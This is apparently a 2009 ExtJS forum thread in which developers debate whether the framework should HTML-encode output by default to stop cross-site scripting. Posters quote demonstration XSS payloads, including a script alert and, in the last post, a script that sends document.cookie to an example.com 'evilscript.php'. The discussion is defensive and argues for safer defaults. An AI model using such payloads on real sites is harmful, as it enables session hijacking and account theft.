-
20 Nov 2009 1:42 AM #91
Cleaning up html on entry from the client-side is not the right way to go I think. The big point of cleaning it up is to avoid security issues, and nothing you do client-side on input actually matters security-wise. We use htmlpurifier on the server to clean up html code. We also don't trust anything in the database and always html-encode all output, but we have to html-encode on the client because our server has to be platform-agnostic.
-
21 Nov 2009 5:33 AM #92
I'm sorry to disappoint you, but this approach will make the problem even worse. It only pretends to fix it, giving you false hope for security.
By the way, you simply can't do this kind of validation by disallowing otherwise legitimate set of characters. Imagine your users will not be able to write mathematical equations with the relational operators < and >. For example: "a < b + c > d". See, I still can post a message with these characters in this vBulletin forum without threating anyone's security. Or your users will be unable to post HTML code examples because of erroneous validation rules.
The only real solution to the XSS problem is to encode user data properly where it gets rendered in HTML -- in ExtJS widgets. This rule has to be applied systematically to every single ExtJS widget. It's been told here so many times, but still...
-
21 Nov 2009 5:51 AM #93
By the way, here is a simple demonstration of the vulnerability.
Open Editor Grid Example in your browser. Please prefer Firefox for now. Try editing any of the grid cells, paste the following piece of code verbatim in it:
Unfocus cell to complete editing, watch nasty thing happens to your browser.Code:<script>alert("you've been hacked!");</script>
You can experiment with other tags as well, tryfor more fun.Code:<plaintext>
Please note that this is purely client side application, it does not talk to the server at all.
No HTML purifier running on the server will prevent this problem.
EDIT:
I quoted joeri's message but after rereading it I'm not sure I understand him correctly so I removed quote.Last edited by caustic; 21 Nov 2009 at 9:03 AM. Reason: Removed joeri's quote.
-
21 Nov 2009 7:18 AM #94
@caustic -- I'm far from disappointed (and frankly, glad we can all swap ideas).
The point of the post was to point out that there are ways of handling the dangers from several fronts.
On the input side (for those who feal that could be a risk vector) Vtype validation is but one tool at your disposal. The validation function could easily be hardened/softened with something as simple as:
That handles both of these with grace:Code:Ext.apply(Ext.form.VTypes,{ safeAlphanum: function(value, field){ if(safeAlphanumRe.test(value)){ //might there be a problem here ? return value == Ext.util.Format.stripTags(value); } return true; }, safeAlphanumMask : /[a-z0-9_]/i, //allowed initial character input for mathematicians safeAlphanumText : 'This field should only contain letters, numbers, _, and NO markup' });
It's all about implementation choices (and custom Vtypes are a flexible way to address the varied input requirements). In fact, all your VTypes could be chained to one like the above.Code:<script>alert("you've been hacked!");</script> "a < b + c > d"
What you are proposing on the surface is commendable and makes absolute sense!
If you are implying the framework should do it for you, think about what that would do to:
Ext.Updater (for those who persist in the notion that raw markup with inline scripts to build components is the right way to go).
Should a major piece of functionality like that be crippled by a systemic lockdown by the framework itself (beyond what the default loadScripts:false already does)?
What else might qualify (beyond inline <script>s) as undesirable markup? Perhaps a hidden Form? Should a framework search and destroy those?
(All JS Frameworks of consequence have XSS risk here!)
How does the developer mitigate risk here? He/she implements an appropriate custom renderer based on the use-context (and the trusted-source) of the content.
The framework can't make that decision, can it?
Any 'renderer' COULD/SHOULD implement something comparable to stripTags, but again, the only person that could possibly decide where and when to 'harden' those is the developer.
Ext has the requisite flexibility to handle these where appropriate. We just need to work on a set of best-practice recommendations -- again.
"be dom-ready..."
Doug Hendricks
Maintaining ux: ManagedIFrame, MIF2 (FAQ, Wiki), ux.Media/Flash, AudioEvents, ux.Chart[Fusion,OFC,amChart], ext-basex.js/$JIT, Documentation Site.
Got Sencha licensing questions? Find out more here.
-
23 Nov 2009 12:33 AM #95
@hendricd: you're making this argument into something it's not.
The argument is not what choices the developer can make, it's what defaults for those choices are made for them by the framework. Raw renderers are imho the wrong way to go in the majority of cases, so to me it doesn't make sense to default to that behavior. Why should it require conscious effort to get the "correct" behavior and no effort to get the wrong behavior? Why can't it be the other way around, that Ext.Updater by default tries to prevent mayhem, and a user has to set a flag to not make it do that? Same thing with the grid column renderer, why can't that default to "safe" behavior and require an active effort to switch to "unsafe" behavior?
-
23 Nov 2009 10:56 AM #96
Since I have rekindled this debate, I figure I should weigh in again on this. I will do so by sharing my opinions which I hope will further explain why I feel Ext should change it's behavior.
Point #1: Data should be persisted in a raw format because we can't assume how it will be rendered later
Let's take for example an online HTML quiz that asks the question: "Please provide an example of a JavaScript Include" to which the proper answer would be:
What some people here are arguing is that before persisting the answer to this question to storage (such as a database) we should HTML encode this string into it's "secure" format for later HTML rendering:Code:<script type="text/javascript" src="http://www.example.com/example.js"></script>
This works great if the only renderer of our data is an HTML-aware platform, but what if we later have to render that data to a text-only format such as a terminal? Now every other presentation layer has to be HTML-aware in order to first de-HTML the data in order to prepare it for rendering.Code:<script type="text/javascript" src="http://www.example.com/example.js"></script%gt;
The problem here is two-fold"- We have coupled the data layer and the presentation layer by forcing the data layer to be aware of how the data will eventually be used. Even worse, we have forced it into supporting only one possible presentation layer!
- We have coupled each presentation layer to the single presentation layer that the data layer is now pre-encoding for.
What should be happening is that the system should accept all valid data and allow each presentation layer to decide how it needs to encode data based on it's own requirements. This allows every component of the application to be blissfully unaware of the others. The data layer simply persists data as provided and each presentation later processes it's raw data according to it's own necessity.
A real world example
The project I am working on exposes a public set of web services that aggregate data from various sources. What people are proposing on here is that I should HTML encode this data either when it is saved, or as it is sent as a response from the web server. This is silly because I can not assume that the consumers of my web services are HTML rendering agents or even HTML aware. It is up to the consumers to know how they will be presenting the data from my web service and displaying it as they see fit.
-
23 Nov 2009 11:01 AM #97
Point #2: Valid is different than secure
A few people have brought up the red herring of "Well we filter for SQL Injection, so this is no different." This is wrong.
If I ask the question on a form: "Please show an example of a valid SQL Select Statement" a completely valid answer to that question is:
That is VALID input, but it is however not SECURE input. My data layer will need to protect itself from SQL injection attacks by properly handling it's queries and the arguments that go into them, but it will not by any means be sanitizing that string.Code:SELECT u.* FROM dbo.users AS u WHERE u.active = 1
Likewise, just because the answer to the previous example question is not SECURE, doesn't mean it is not 100% VALID. In that case it is only insecure in one presentation layer, the job of which it would be to secure it.
-
23 Nov 2009 11:12 AM #98
Point #3: All systems should default-to-secure and since Ext is primarily an HTML rendering layer, it should default-to-HTML Encode it's data unless explicitly told not to.
I don't really have much to discuss on this point, I think the point itself contains the argument.
The only argument against this really is that it may break backwards compatibility, but due to the potentially severe security flaws related to this and the relative ease to fix the compatibility problems I believe it would be the right path to take.
-
23 Nov 2009 11:18 AM #99
Those are the main points I have for now, I'm seriously hoping that the Ext development team starts looking at this problem again and takes it seriously.
I'm really saddened to see how few of the posters in this thread even understand the issue, regardless of whether they want to take action on it.
-
23 Nov 2009 11:26 AM #100
That is exactly what I am saying. But note that it's not the AJAX layer that should be encoding, it's the presentation layer (Column Renderers, Panel Bodies, Message Boxes, etc.)
In this case ext is the presentation layer and the presentation layer should never, ever blindly accept and trust the data it receives from the data layer unless explicitly told to.
Real world example:
Every time a user types a search term into the search box on the front-end, that search is saved to a table.
In the admin there is an Ext grid that constantly refreshes to display recent search terms.
With the default Ext behavior, a user could input this as a search term:
At which point, the next admin to view the grid (which would blindly pass along raw-data) of search terms would have their cookies stolen which would give the attacker access to their account potentially.Code:<script type="text/javascript">var img = document.createElement('img'); img.src='http://www.example.com/evilscript.php?cookie=' + document.cookie; document.getElementsByTagName('body')[0].appendChild(img);</script>
We can not pre-HTML-encode the data as we also export the lists of search terms in TEXT based formats.
I hope this helps.


Reply With Quote


